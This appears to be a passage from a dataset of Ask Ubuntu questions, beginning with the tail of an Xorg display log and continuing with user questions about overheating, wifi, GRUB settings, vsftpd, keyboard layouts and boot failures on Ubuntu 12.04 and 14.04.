manufacturer 's mask : 0 [ 44708.641 ] ( ii ) modesetting ( 0 ) : supported standard timings : [ 44708.641 ] ( ii ) modesetting ( 0 ) : # 0 : hsize : 1280 vsize 1024 refresh : 60 vid : 32897 [ 44708.641 ] ( ii ) modesetting ( 0 ) : # 1 : hsize : 1152 vsize 864 refresh : 75 vid : 20337 [ 44708.641 ] ( ii ) modesetting ( 0 ) : # 2 : hsize : 1440 vsize 900 refresh : 60 vid : 149 [ 44708.641 ] ( ii ) modesetting ( 0 ) : # 3 : hsize : 1440 vsize 900 refresh : 75 vid : 3989 [ 44708.641 ] ( ii ) modesetting ( 0 ) : # 4 : hsize : 1600 vsize 1200 refresh : 60 vid : 16553 [ 44708.641 ] ( ii ) modesetting ( 0 ) : # 5 : hsize : 1680 vsize 1050 refresh : 60 vid : 179 [ 44708.641 ] ( ii ) modesetting ( 0 ) : supported detailed timing : [ 44708.641 ] ( ii ) modesetting ( 0 ) : clock : 138.5 mhz image size : 531 x 298 mm [ 44708.641 ] ( ii ) modesetting ( 0 ) : h_active : 1920 h_sync : 1968 h_sync_end 2000 h_blank_end 2080 h_border : 0 [ 44708.641 ] ( ii ) modesetting ( 0 ) : v_active : 1080 v_sync : 1083 v_sync_end 1088 v_blanking : 1111 v_border : 0 [ 44708.641 ] ( ii ) modesetting ( 0 ) : monitor name : h243h [ 44708.641 ] ( ii ) modesetting ( 0 ) : ranges : v min : 56 v max : 76 hz , h min : 31 h max : 83 khz , pixclock max 185 mhz [ 44708.641 ] ( ii ) modesetting ( 0 ) : serial no : lew0c0044002 [ 44708.641 ] ( ii ) modesetting ( 0 ) : edid ( in hex ) : [ 44708.641 ] ( ii ) modesetting ( 0 ) : 00ffffffffffff000472740031f60094 [ 44708.641 ] ( ii ) modesetting ( 0 ) : 2813010368351d78ea6085a6564a9c25 [ 44708.641 ] ( ii ) modesetting ( 0 ) : 125054afcf008180714f9500950fa940 [ 44708.641 ] ( ii ) modesetting ( 0 ) : b300010101011a3680a070381f403020 [ 44708.641 ] ( ii ) modesetting ( 0 ) : 3500132a2100001a000000fc00483234 [ 44708.642 ] ( ii ) modesetting ( 0 ) : 33480a20202020202020000000fd0038 [ 44708.642 ] ( ii ) modesetting ( 0 ) : 4c1f5312000a202020202020000000ff [ 44708.642 ] ( ii ) modesetting ( 0 ) : 004c45573043303034343030320a003c [ 44708.642 ] ( ii ) modesetting ( 0 ) : printing probed modes for output vga-0 [ 44708.642 ] ( ii ) modesetting ( 0 ) : modeline `` 1280x1024 '' x75.0 135.00 1280 1296 1440 1688 1024 1025 1028 1066 +hsync +vsync ( 80.0 khz uep ) [ 44708.642 ] ( ii ) modesetting ( 0 ) : modeline `` 1920x1080 '' x59.9 138.50 1920 1968 2000 2080 1080 1083 1088 1111 +hsync -vsync ( 66.6 khz ep ) [ 44708.642 ] ( ii ) modesetting ( 0 ) : modeline `` 1600x1200 '' x60.0 162.00 1600 1664 1856 2160 1200 1201 1204 1250 +hsync +vsync ( 75.0 khz e ) [ 44708.642 ] ( ii ) modesetting ( 0 ) : modeline `` 1680x1050 '' x60.0 146.25 1680 1784 1960 2240 1050 1053 1059 1089 -hsync +vsync ( 65.3 khz e ) [ 44708.642 ] ( ii ) modesetting ( 0 ) : modeline `` 1280x1024 '' x60.0 108.00 1280 1328 1440 1688 1024 1025 1028 1066 +hsync +vsync ( 64.0 khz e ) [ 44708.642 ] ( ii ) modesetting ( 0 ) : modeline `` 1440x900 '' x75.0 136.75 1440 1536 1688 1936 900 903 909 942 -hsync +vsync ( 70.6 khz e ) [ 44708.642 ] ( ii ) modesetting ( 0 ) : modeline `` 1440x900 '' x59.9 106.50 1440 1520 1672 1904 900 903 909 934 -hsync +vsync ( 55.9 khz e ) [ 44708.642 ] ( ii ) modesetting ( 0 ) : modeline `` 1152x864 '' x75.0 108.00 1152 1216 1344 1600 864 865 868 900 +hsync +vsync ( 67.5 khz e ) [ 44708.642 ] ( ii ) modesetting ( 0 ) : modeline `` 1024x768 '' x75.1 78.80 1024 1040 1136 1312 768 769 772 800 +hsync +vsync ( 60.1 khz e ) [ 44708.642 ] ( ii ) modesetting ( 0 ) : modeline `` 1024x768 '' x70.1 75.00 1024 1048 1184 1328 768 771 777 806 -hsync -vsync ( 56.5 khz e ) [ 44708.642 ] ( ii ) modesetting ( 0 ) : modeline `` 1024x768 '' x60.0 65.00 1024 1048 1184 1344 768 771 777 806 -hsync -vsync ( 48.4 khz e ) [ 44708.642 ] ( ii ) modesetting ( 0 ) : modeline `` 800x600 '' x72.2 50.00 800 856 976 1040 600 637 643 666 +hsync +vsync ( 48.1 khz e ) [ 44708.642 ] ( ii ) modesetting ( 0 ) : modeline `` 800x600 '' x75.0 49.50 800 816 896 1056 600 601 604 625 +hsync +vsync ( 46.9 khz e ) [ 44708.642 ] ( ii ) modesetting ( 0 ) : modeline `` 800x600 '' x60.3 40.00 800 840 968 1056 600 601 605 628 +hsync +vsync ( 37.9 khz e ) [ 44708.642 ] ( ii ) modesetting ( 0 ) : modeline `` 800x600 '' x56.2 36.00 800 824 896 1024 600 601 603 625 +hsync +vsync ( 35.2 khz e ) [ 44708.642 ] ( ii ) modesetting ( 0 ) : modeline `` 640x480 '' x75.0 31.50 640 656 720 840 480 481 484 500 -hsync -vsync ( 37.5 khz e ) [ 44708.642 ] ( ii ) modesetting ( 0 ) : modeline `` 640x480 '' x72.8 31.50 640 664 704 832 480 489 491 520 -hsync -vsync ( 37.9 khz e ) [ 44708.642 ] ( ii ) modesetting ( 0 ) : modeline `` 640x480 '' x60.0 25.20 640 656 752 800 480 490 492 525 -hsync -vsync ( 31.5 khz e ) [ 44708.642 ] ( ii ) modesetting ( 0 ) : modeline `` 720x400 '' x70.1 28.32 720 738 846 900 400 412 414 449 -hsync +vsync ( 31.5 khz e ) [ 44708.645 ] ( ii ) modesetting ( 0 ) : edid for output dvi-0 [ 44708.645 ] ( ii ) modesetting ( 0 ) : output vga-0 connected [ 44708.645 ] ( ii ) modesetting ( 0 ) : output dvi-0 disconnected [ 44708.645 ] ( ii ) modesetting ( 0 ) : using user preference for initial modes [ 44708.645 ] ( ii ) modesetting ( 0 ) : output vga-0 using initial mode 1280x1024 [ 44708.645 ] ( ii ) modesetting ( 0 ) : using default gamma of ( 1.0 , 1.0 , 1.0 ) unless otherwise stated . [ 44708.645 ] ( == ) modesetting ( 0 ) : dpi set to ( 96 , 96 ) [ 44708.645 ] ( ii ) loading sub module `` fb '' [ 44708.645 ] ( ii ) loadmodule : `` fb '' [ 44708.645 ] ( ii ) loading /usr/lib/xorg/modules/libfb.so [ 44708.645 ] ( ii ) module fb : vendor= '' x.org foundation '' [ 44708.645 ] compiled for 1.15.1 , module version = 1.0.0 [ 44708.645 ] abi class : x.org ansi c emulation , version 0.4 [ 44708.645 ] ( ii ) loading sub module `` shadow '' [ 44708.645 ] ( ii ) loadmodule : `` shadow '' [ 44708.646 ] ( ii ) loading /usr/lib/xorg/modules/libshadow.so [ 44708.646 ] ( ii ) module shadow : vendor= '' x.org foundation '' [ 44708.646 ] compiled for 1.15.1 , module version = 1.1.0 [ 44708.646 ] abi class : x.org ansi c emulation , version 0.4 [ 44708.646 ] ( ** ) modesetting ( g0 ) : depth 16 , ( -- ) framebuffer bpp 16 [ 44708.646 ] ( == ) modesetting ( g0 ) : rgb weight 565 [ 44708.646 ] ( == ) modesetting ( g0 ) : default visual is truecolor [ 44708.646 ] ( ii ) modesetting ( g0 ) : shadowfb : preferred no , enabled no [ 44708.727 ] ( ii ) modesetting ( g0 ) : output dvi-1-0 using monitor section displaylinkmonitor [ 44708.808 ] ( ii ) modesetting ( g0 ) : edid for output dvi-1-0 [ 44708.808 ] ( ii ) modesetting ( g0 ) : manufacturer : wde model : 1702 serial # : 0 [ 44708.808 ] ( ii ) modesetting ( g0 ) : year : 2005 week : 14 [ 44708.808 ] ( ii ) modesetting ( g0 ) : edid version : 1.3 [ 44708.808 ] ( ii ) modesetting ( g0 ) : analog display input , input voltage level : 0.700/0.700 v [ 44708.808 ] ( ii ) modesetting ( g0 ) : sync : separate [ 44708.808 ] ( ii ) modesetting ( g0 ) : max image size [ cm ] : horiz . : 34 vert . : 27 [ 44708.808 ] ( ii ) modesetting ( g0 ) : gamma : 2.20 [ 44708.808 ] ( ii ) modesetting ( g0 ) : dpms capabilities : standby suspend off ; rgb/color display [ 44708.808 ] ( ii ) modesetting ( g0 ) : default color space is primary color space [ 44708.808 ] ( ii ) modesetting ( g0 ) : first detailed timing is preferred mode [ 44708.808 ] ( ii ) modesetting ( g0 ) : gtf timings supported [ 44708.808 ] ( ii ) modesetting ( g0 ) : redx : 0.643 redy : 0.352 greenx : 0.283 greeny : 0.608 [ 44708.808 ] ( ii ) modesetting ( g0 ) : bluex : 0.147 bluey : 0.102 whitex : 0.313 whitey : 0.329 [ 44708.808 ] ( ii ) modesetting ( g0 ) : supported established timings : [ 44708.808 ] ( ii ) modesetting ( g0 ) : 720x400 @ 70hz [ 44708.808 ] ( ii ) modesetting ( g0 ) : 640x480 @ 60hz [ 44708.808 ] ( ii ) modesetting ( g0 ) : 640x480 @ 67hz [ 44708.808 ] ( ii ) modesetting ( g0 ) : 640x480 @ 72hz [ 44708.808 ] ( ii ) modesetting ( g0 ) : 640x480 @ 75hz [ 44708.808 ] ( ii ) modesetting ( g0 ) : 800x600 @ 56hz [ 44708.808 ] ( ii ) modesetting ( g0 ) : 800x600 @ 60hz [ 44708.808 ] ( ii ) modesetting ( g0 ) : 800x600 @ 72hz [ 44708.808 ] ( ii ) modesetting ( g0 ) : 800x600 @ 75hz [ 44708.808 ] ( ii ) modesetting ( g0 ) : 832x624 @ 75hz [ 44708.808 ] ( ii ) modesetting ( g0 ) : 1024x768 @ 60hz [ 44708.808 ] ( ii ) modesetting ( g0 ) : 1024x768 @ 70hz [ 44708.808 ] ( ii ) modesetting ( g0 ) : 1024x768 @ 75hz [ 44708.809 ] ( ii ) modesetting ( g0 ) : 1280x1024 @ 75hz [ 44708.809 ] ( ii ) modesetting ( g0 ) : manufacturer 's mask : 0 [ 44708.809 ] ( ii ) modesetting ( g0 ) : supported standard timings : [ 44708.809 ] ( ii ) modesetting ( g0 ) : # 0 : hsize : 1280 vsize 1024 refresh : 60 vid : 32897 [ 44708.809 ] ( ii ) modesetting ( g0 ) : # 1 : hsize : 1152 vsize 864 refresh : 75 vid : 20337 [ 44708.809 ] ( ii ) modesetting ( g0 ) : supported detailed timing : [ 44708.809 ] ( ii ) modesetting ( g0 ) : clock : 108.0 mhz image size : 338 x 270 mm [ 44708.809 ] ( ii ) modesetting ( g0 ) : h_active : 1280 h_sync : 1328 h_sync_end 1440 h_blank_end 1688 h_border : 0 [ 44708.809 ] ( ii ) modesetting ( g0 ) : v_active : 1024 v_sync : 1025 v_sync_end 1028 v_blanking : 1066 v_border : 0 [ 44708.809 ] ( ii ) modesetting ( g0 ) : ranges : v min : 50 v max : 75 hz , h min : 30 h max : 82 khz , pixclock max 145 mhz [ 44708.809 ] ( ii ) modesetting ( g0 ) : monitor name : wde lcm-17v2 [ 44708.809 ] ( ii ) modesetting ( g0 ) : serial no : 0 [ 44708.809 ] ( ii ) modesetting ( g0 ) : edid ( in hex ) : [ 44708.809 ] ( ii ) modesetting ( g0 ) : 00ffffffffffff005c85021700000000 [ 44708.809 ] ( ii ) modesetting ( g0 ) : 0e0f010368221b78ef8bc5a45a489b25 [ 44708.809 ] ( ii ) modesetting ( g0 ) : 1a5054bfef008180714f010101010101 [ 44708.809 ] ( ii ) modesetting ( g0 ) : 010101010101302a009851002a403070 [ 44708.809 ] ( ii ) modesetting ( g0 ) : 1300520e1100001e000000fd00324b1e [ 44708.809 ] ( ii ) modesetting ( g0 ) : 520e000a202020202020000000fc0057 [ 44708.809 ] ( ii ) modesetting ( g0 ) : 4445204c434d2d313776320a000000ff [ 44708.809 ] ( ii ) modesetting ( g0 ) : 00300a202020202020202020202000e7 [ 44708.809 ] ( ii ) modesetting ( g0 ) : printing probed modes for output dvi-1-0 [ 44708.809 ] ( ii ) modesetting ( g0 ) : modeline `` 1280x1024 '' x60.0 108.00 1280 1328 1440 1688 1024 1025 1028 1066 +hsync +vsync ( 64.0 khz uep ) [ 44708.809 ] ( ii ) modesetting ( g0 ) : modeline `` 1280x1024 '' x75.0 135.00 1280 1296 1440 1688 1024 1025 1028 1066 +hsync +vsync ( 80.0 khz e ) [ 44708.809 ] ( ii ) modesetting ( g0 ) : modeline `` 1280x960 '' x60.0 108.00 1280 1376 1488 1800 960 961 964 1000 +hsync +vsync ( 60.0 khz e ) [ 44708.809 ] ( ii ) modesetting ( g0 ) : modeline `` 1280x800 '' x74.9 106.50 1280 1360 1488 1696 800 803 809 838 -hsync +vsync ( 62.8 khz e ) [ 44708.809 ] ( ii ) modesetting ( g0 ) : modeline `` 1280x800 '' x59.8 83.50 1280 1352 1480 1680 800 803 809 831 +hsync -vsync ( 49.7 khz e ) [ 44708.809 ] ( ii ) modesetting ( g0 ) : modeline `` 1152x864 '' x75.0 108.00 1152 1216 1344 1600 864 865 868 900 +hsync +vsync ( 67.5 khz e ) [ 44708.809 ] ( ii ) modesetting ( g0 ) : modeline `` 1280x768 '' x74.9 102.25 1280 1360 1488 1696 768 771 778 805 +hsync -vsync ( 60.3 khz e ) [ 44708.809 ] ( ii ) modesetting ( g0 ) : modeline `` 1280x768 '' x59.9 79.50 1280 1344 1472 1664 768 771 778 798 -hsync +vsync ( 47.8 khz e ) [ 44708.810 ] ( ii ) modesetting ( g0 ) : modeline `` 1024x768 '' x75.1 78.80 1024 1040 1136 1312 768 769 772 800 +hsync +vsync ( 60.1 khz e ) [ 44708.810 ] ( ii ) modesetting ( g0 ) : modeline `` 1024x768 '' x70.1 75.00 1024 1048 1184 1328 768 771 777 806 -hsync -vsync ( 56.5 khz e ) [ 44708.810 ] ( ii ) modesetting ( g0 ) : modeline `` 1024x768 '' x60.0 65.00 1024 1048 1184 1344 768 771 777 806 -hsync -vsync ( 48.4 khz e ) [ 44708.810 ] ( ii ) modesetting ( g0 ) : modeline `` 1024x576 '' x60.0 46.97 1024 1064 1168 1312 576 577 580 597 -hsync +vsync ( 35.8 khz ) [ 44708.810 ] ( ii ) modesetting ( g0 ) : modeline `` 832x624 '' x74.6 57.28 832 864 928 1152 624 625 628 667 -hsync -vsync ( 49.7 khz e ) [ 44708.810 ] ( ii ) modesetting ( g0 ) : modeline `` 800x600 '' x72.2 50.00 800 856 976 1040 600 637 643 666 +hsync +vsync ( 48.1 khz e ) [ 44708.810 ] ( ii ) modesetting ( g0 ) : modeline `` 800x600 '' x75.0 49.50 800 816 896 1056 600 601 604 625 +hsync +vsync ( 46.9 khz e ) [ 44708.810 ] ( ii ) modesetting ( g0 ) : modeline `` 800x600 '' x60.3 40.00 800 840 968 1056 600 601 605 628 +hsync +vsync ( 37.9 khz e ) [ 44708.810 ] ( ii ) modesetting ( g0 ) : modeline `` 800x600 '' x56.2 36.00 800 824 896 1024 600 601 603 625 +hsync +vsync ( 35.2 khz e ) [ 44708.810 ] ( ii ) modesetting ( g0 ) : modeline `` 848x480 '' x60.0 33.75 848 864 976 1088 480 486 494 517 +hsync +vsync ( 31.0 khz e ) [ 44708.810 ] ( ii ) modesetting ( g0 ) : modeline `` 640x480 '' x75.0 31.50 640 656 720 840 480 481 484 500 -hsync -vsync ( 37.5 khz e ) [ 44708.810 ] ( ii ) modesetting ( g0 ) : modeline `` 640x480 '' x72.8 31.50 640 664 704 832 480 489 491 520 -hsync -vsync ( 37.9 khz e ) [ 44708.810 ] ( ii ) modesetting ( g0 ) : modeline `` 640x480 '' x66.7 30.24 640 704 768 864 480 483 486 525 -hsync -vsync ( 35.0 khz e ) [ 44708.810 ] ( ii ) modesetting ( g0 ) : modeline `` 640x480 '' x60.0 25.20 640 656 752 800 480 490 492 525 -hsync -vsync ( 31.5 khz e ) [ 44708.810 ] ( ii ) modesetting ( g0 ) : modeline `` 720x400 '' x70.1 28.32 720 738 846 900 400 412 414 449 -hsync +vsync ( 31.5 khz e ) [ 44708.810 ] ( ii ) modesetting ( g0 ) : using default gamma of ( 1.0 , 1.0 , 1.0 ) unless otherwise stated . [ 44708.810 ] ( == ) modesetting ( g0 ) : dpi set to ( 96 , 96 ) [ 44708.810 ] ( ii ) loading sub module `` fb '' [ 44708.810 ] ( ii ) loadmodule : `` fb '' [ 44708.810 ] ( ii ) loading /usr/lib/xorg/modules/libfb.so [ 44708.810 ] ( ii ) module fb : vendor= '' x.org foundation '' [ 44708.810 ] compiled for 1.15.1 , module version = 1.0.0 [ 44708.811 ] abi class : x.org ansi c emulation , version 0.4 [ 44708.811 ] ( ii ) unloadmodule : `` radeon '' [ 44708.811 ] ( ii ) unloading radeon [ 44708.811 ] ( ii ) unloadmodule : `` fbdev '' [ 44708.811 ] ( ii ) unloading fbdev [ 44708.811 ] ( ii ) unloadsubmodule : `` fbdevhw '' [ 44708.811 ] ( ii ) unloading fbdevhw [ 44708.811 ] ( ii ) unloadmodule : `` vesa '' [ 44708.811 ] ( ii ) unloading vesa [ 44708.811 ] ( == ) modesetting ( g0 ) : backing store enabled [ 44708.811 ] ( == ) modesetting ( g0 ) : silken mouse enabled [ 44708.812 ] ( ii ) modesetting ( g0 ) : randr 1.2 enabled , ignore the following randr disabled message . [ 44708.812 ] ( == ) modesetting ( g0 ) : dpms enabled [ 44708.812 ] ( ww ) modesetting ( g0 ) : option `` fbdev '' is not used [ 44708.812 ] ( == ) modesetting ( 0 ) : backing store enabled [ 44708.812 ] ( == ) modesetting ( 0 ) : silken mouse enabled [ 44708.812 ] ( ii ) modesetting ( 0 ) : randr 1.2 enabled , ignore the following randr disabled message . [ 44708.812 ] ( == ) modesetting ( 0 ) : dpms enabled [ 44708.812 ] ( ww ) modesetting ( 0 ) : option `` fbdev '' is not used [ 44708.856 ] ( -- ) randr disabled [ 44708.867 ] ( ii ) selinux : disabled on system [ 44708.868 ] ( ii ) aiglx : screen 0 is not dri2 capable [ 44708.868 ] ( ee ) aiglx : reverting to software rendering [ 44708.878 ] ( ii ) aiglx : loaded and initialized swrast [ 44708.878 ] ( ii ) glx : initialized driswrast gl provider for screen 0 [ 44708.879 ] ( ii ) modesetting ( g0 ) : damage tracking initialized [ 44708.879 ] ( ii ) modesetting ( 0 ) : damage tracking initialized [ 44708.879 ] ( ii ) modesetting ( 0 ) : setting screen physical size to 338 x 270 [ 44708.900 ] ( ii ) xkb : generating xkmfile /tmp/server-b20d7fc79c7f597315e3e501aef10e0d866e8e92.xkm [ 44708.918 ] ( ii ) config/udev : adding input device power button ( /dev/input/event1 ) [ 44708.918 ] ( ** ) power button : applying inputclass `` evdev keyboard catchall '' [ 44708.918 ] ( ii ) loadmodule : `` evdev '' [ 44708.918 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 44708.918 ] ( ii ) module evdev : vendor= '' x.org foundation '' [ 44708.918 ] compiled for 1.15.0 , module version = 2.8.2 [ 44708.918 ] module class : x.org xinput driver [ 44708.918 ] abi class : x.org xinput driver , version 20.0 [ 44708.918 ] ( ii ) using input driver 'evdev ' for 'power button' [ 44708.918 ] ( ** ) power button : always reports core events [ 44708.918 ] ( ** ) evdev : power button : device : `` /dev/input/event1 '' [ 44708.918 ] ( -- ) evdev : power button : vendor 0 product 0x1 [ 44708.918 ] ( -- ) evdev : power button : found keys [ 44708.918 ] ( ii ) evdev : power button : configuring as keyboard [ 44708.918 ] ( ** ) option `` config_info '' `` udev : /sys/devices/lnxsystm:00/lnxpwrbn:00/input/input1/event1 '' [ 44708.918 ] ( ii ) xinput : adding extended input device `` power button '' ( type : keyboard , id 6 ) [ 44708.918 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 44708.918 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 44708.918 ] ( ** ) option `` xkb_layout '' `` us '' [ 44708.919 ] ( ii ) config/udev : adding input device power button ( /dev/input/event0 ) [ 44708.919 ] ( ** ) power button : applying inputclass `` evdev keyboard catchall '' [ 44708.919 ] ( ii ) using input driver 'evdev ' for 'power button' [ 44708.919 ] ( ** ) power button : always reports core events [ 44708.919 ] ( ** ) evdev : power button : device : `` /dev/input/event0 '' [ 44708.919 ] ( -- ) evdev : power button : vendor 0 product 0x1 [ 44708.919 ] ( -- ) evdev : power button : found keys [ 44708.919 ] ( ii ) evdev : power button : configuring as keyboard [ 44708.919 ] ( ** ) option `` config_info '' `` udev : /sys/devices/lnxsystm:00/device:00/pnp0c0c:00/input/input0/event0 '' is there anything i can do to fix this problem .
458987	overheating toshiba satellite l655 laptop with ubuntu 14.04 lts	i switched to ubuntu from windows roughly a week ago . so i 'm pretty new to ubuntu . i 'm experiencing overheating problem with my laptop and sometimes it 's turned off suddenly . i have a toshiba l655 laptop with ubuntu 14.04 lts - 64bit . i installed lm-sensors package and measured the temperature . it is continuously increasing when i 'm working ( just web browsing ) i googled my problem and found few solutions given in some forums . to solve this first i installed proprietary video driver from `` software & updates '' - > `` additional drivers '' tab . ( vga = amd/ati - mobility radeon hd 5430/5450/5470 ) yet it did n't make any improvement . then i edited /etc/default/grub and set grub_cmdline_linux= '' acpi.power_nocheck=1 '' and saved ( found from a forum ) . after that i executed this command sudo update-grub and rebooted . still no sign of an improvement . then i installed another package sudo add-apt-repository ppa : linrunner/tlp sudo apt-get update sudo apt-get install tlp tlp-rdw sudo tlp start nothing changed . may be the problem is with my cooling fan , when i was using windows the cooling fan functioned frequently and i did n't have any issue like this . now with ubuntu 14.04 cooling fan is almost not operating . very rarely it comes and goes and at that time i observe the temperature goes down . i really appreciate if anyone can help me to solve this problem .
458988	audio track framerate 25 ( pal ) -- > 23,976 ( ntsc )	here 's my problem : i need to change the framerate of the audio track of one of my films from 25 to 23,976 fps ( to mux it with a full hd version ) ; i used to make use of handbrake , re-encoding the film at highspeed and changing the framerate , setting the audio at high quality this time , i 'd like to change the framerate without affecting the audio quality nor re-encoding with a different format . is there a way ? ( maybe ffmpeg ? -- > if so , please post the commands ) please someone help me
458989	how do i access the command prompt in lubuntu ?	i have managed the task of loading lubuntu into a partition of my thinkpad t41 , and am so far very happy with it . i have learned that there is a driver available for my old scanner , but apparently it has to be loaded by typing into command prompt . i 'm sure other programs will require the same . i had not found how to access the command prompt from my desktop . but now i know ! where is it ? click the `` start '' button on the bottom left , then click on `` run '' and it comes up . duh !
458991	modify keyboard layout unity in 14.04	how to set the meta key with xkb ? adding key < aa06 > { [ meta , meta ] } ; to /usr/share/x11/xkb/symbols/us ( in the `` basic '' section ) and then running sudo dpgk-reconfigure xkb-data seems to work some times , and other times not . in particular , it seems to forget my setting when i switch back and forth between keyboard layouts ( even though i added a similar line to the swedish layout that i 'm also using ) . checking with xev , the key i want as meta is initially mapped to meta_l ( as it should be ) but after a switch of keyboard layouts , it 's mapped to nosymbol . sometimes the behaviour is less predictable , and it 's mapped to 'nosymbol ' already at boot . how would i go ahead to get a better picture of where it 's going wrong ?
458992	vsftpd : both local and anonymous access disabled !	i am having difficulties with vsftp . i installed it and then edited the /etc/vsftp.conf file ; changing it , to have : anonymous enable = no local enable = yes write enable yes i have tried to add my user to the etc/vsftpd/userlist by using nano . i am relatively unexperienced , using an unbuntu server .
458993	what do i restart after training spamassassin ?	i just set up a mail server on 14.04 , with amavis-new and spamassassin . my questions : i enabled spamd , but is amavis-new even using it ? how do i tell ? every time after i run sa-learn to train spamassassin ( with -- dbpath /var/lib/amavis/.spamassassin/ ) , what do i need to restart - amavis , spamd , or both ?
458994	ubuntu 12.04 lts wifi issues	i have the latest available driver installed from the additional drivers menu . this driver is proprietary . however , even with this properly installed my pc still has issues due to the wifi disconnecting and reconnecting at random intervals . i have no idea what the issue is . it happened last time i installed ubuntu but fortunately i found a fix which kept that from happening . but after i did a clean install ( stupid mistakes are stupid ) i can no longer find the fix i used . below is the driver info from the additional drivers menu . this package contains broadcom 802.11 linux sta wireless driver for use with broadcom 's bcm4311- , bcm4312- , bcm4313- , bcm4321- , bcm4322- , bcm43224- , and bcm43225- , bcm43227- and bcm43228-based hardware .
458998	ubuntu quickly : how do i set a button to launch a specific ubuntu application	i 'm very new to linux and i do n't know very much . i was creating my own application with quickly , and i wanted to have a button which launches the hardware information application `` hardinfo '' . i 'm very new and i literally do n't know anything , any help would be very much appreciated . thanks in advance ! update : i 'm not looking for a keyboard shortcut , by button i meant a gtk-button inside glade . how to i set it so that when clicked it would take me to the application `` hardinfo '' . if this is n't possible , then how can i set the button to emulate a keyboard shortcut once clicked , inside glade , thankssssss ! update 2 : what i 'm looking for is a step by step process of how to do this from someone who knows glade and quickly completely , because i have no idea how the codes work and where i 'm supposed to put them : /
459000	what to do about the mt versions of the libboost libraries	i upgraded to 14.04 and now my compiler/linker complains about missing libboost_xxx-mt.so files . i 've seen that in my old version those files where just links to the other libboost files . so what do i do ? do i just create the links , or is there something else intended ?
459001	why does n't gnome 3.10 work in ubuntu 14.04	i just installed ubuntu 14.04 and want to have gnome working instead of unity , i simply typed to console : sudo apt-get install gnome-shell -y some required packages were installed and gdm was along them . i made gdm be the default against lightdm . however , when i log in i ca n't really pick gnome as desktop enviroment at start login screen . there 's ubuntu and system default . ubuntu actually is unity and when i pick system default it 'll login but anything will be loaded but the wallpaper , not any superior or inferior bar , not any effects . just for the record , i tried with lightdm but it wo n't show any option for choosing a desktop enviroment . how can i have gnome ( at least 3.10 ) working properly on my ubuntu ?
459003	question about /etc/default/grub	i had previously changed the grub_cmdline_linux_default= '' quiet splash '' to grub_cmdline_linux_default= '' quiet splash acpi_backlight=vendor '' in order to change my screen brightness with the keyboard buttons . now i want to use thermald and intel p-state to prevent my laptop from overheating . but this too suggests a change of the grub_cmdline_linux_default line in the /etc/default/grub . is there any way to have both acpi_backlight=vendor and intel_pstate=enable ? i am using ubuntu 14.04 lts .
459005	eth0 not automatically starting 12.04	i have to run the following to get eth0 up : ifup eth0 otherwise no internet connection is available . here is my /etc/network/interfaces file which looks perfectly fine to me : # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback auto eth0 iface eth0 inet dhcp post-up /etc/network/if-up.d/update any advice ?
459007	ubuntu 14.04 on acer aspire v3-772 quit on me	i have bought a new acer aspire v3 laptop yesterday , which i wanted to have running with ubuntu . so i installed ubuntu 14.04 from dvd which worked fine for me until this noon . i tried to shut it down and it froze up on me . so i used the magicsysrq to get out of there and tried rebooting to see if everything was still ok . it was n't . the system would n't come up any more , sometimes it would get farther into the startup then other times . e. g : i could start typing my password but everything would freeze the ubuntu purple screen would appear , the dots below the logo moving for some time and finally coming to a halt . ok , maybe something was wrong with the harddrive so i inserted the dvd again and tried reinstalling ubuntu , trusting that in the process the harddrive would be checked and cleaned . since i just installed ubuntu , the loss of data was negligable . to put it in a nutshell : the installation did not even get close to the point where anything would be installed . either it did not reach the start of any user interface at all or it hung up on me during one of the ( early ) steps . so i tried booting from dvd and have the `` try ubuntu '' option to check the hardware from there , but that would not work either . ( same results : startups hanging in various stages ) . meanwhile i kept googling for similar problems and hopefully their solutions but to no avail so far . i just ca n't think of any reason that a system that would install fine one day could not be booted from another medium the other . during install as well as boot from medium i tried using the boot option `` noplymouth '' instead of `` quiet splash '' . the messages shown until the start of xserver showed no errors , or at least none that i could see . also in all cases i tried switching to some terminal using `` ctrl+alt+f1 '' but that would n't work either . i am quite new to running ubuntu , so yes , the task of using ubuntu as sole os on a new laptop might be a wee bit over my head . i hope some of you have an idea of what might be wrong or at which part of my setup i might need to look . if i asked the wrong questions before , let me know as well . i really want this fella to run . the hardware : acer aspire v3-772g intel i7-4702mq 2 . 2ghz nvidia geforce gtx 760m 16 gb ddr3 l ram 1 tb hd blu-ray disc re drive acer nplify 802.11 a/b/g/n + bt 4.0 after the n-th retry to get the laptop started it suddenly came back up as if nothing had happened . i ran some system checks i found on the system ( which was not much , but then again , i am new with ubuntu ) . after playing around with it a bit i thought to try the much feared reboot and behold , it hung again . so i tried installing again now using bootoption `` nomodeset '' and i finally managed to get into the installation . in some forum someone suggested to first get a clean install from usb/dvd without any updates whatsoever which worked as well . i tried rebooting the system and it hung up on me again ( during shutdown ) . so , i tried changing the nvidia driver to the proprietary , tested one and adding nomodeset to the grub . tried rebooting ... and it hung up on me again ( during shutdown ) . this time even the magic sysrq b does not work somehow i managed to get the system into a state , in which it would reboot , if that reboot was triggered from one of the terminals ( ctrl+alt+f2 in my case ) . the login to unity however does not work anymore , but leaves me in a state that has been thoroughly discussed here : unity does n't load no launcher no dash appearsunity does n't load , no launcher , no dash appears the proposed answers did not my cause at all so i think something might be very much broken either with the software or hardware on my machine . i am not going to give up just yet . after another round of reinstallation i installed a basic system with only english language support ( previously german ) . shutdown went awry again : when i was supposed to hit enter after ejecting the install medium nothing happened . after the reboot , i installed all updates first and then tried a reboot from terminal ( ctrl-alt-f2 ) by using sudo shutdown -r now nothing happened until after two minutes some stack traces came dripping into the terminal . rcu_sched detected stalls on cpus and task kworker/u16 blocked for more than 120 seconds google told me that this may occur during times of heavy harddisk traffic or due to some bugs in some older kernels , but i am lost why a newly installed system might be producing this traffic ? i realize that all of these problems might not have anything to do with one another but i can not say for sure .
459010	need help reinstalling ubuntu	alright so i have never used linux before , and decided to try it out so i dual booted with windows 7 using a usb . i installed ubuntu 14.04 alongside windows 7 and i broke it . when i installed ubuntu 14.04 i made / , /boot , swap , and /home partitions . now i want to reinstall it , but i 'm not really sure how i do this . do i use gparted ? if so , how ? do i do the same thing as when i first installed ubuntu by booting through the usb ? and after i do this since i made a separate /home , /boot , and swap partition , do i have to change these as well , or do i format the root partition ? could someone help me out step by step please ? i do n't really know what i 'm doing .
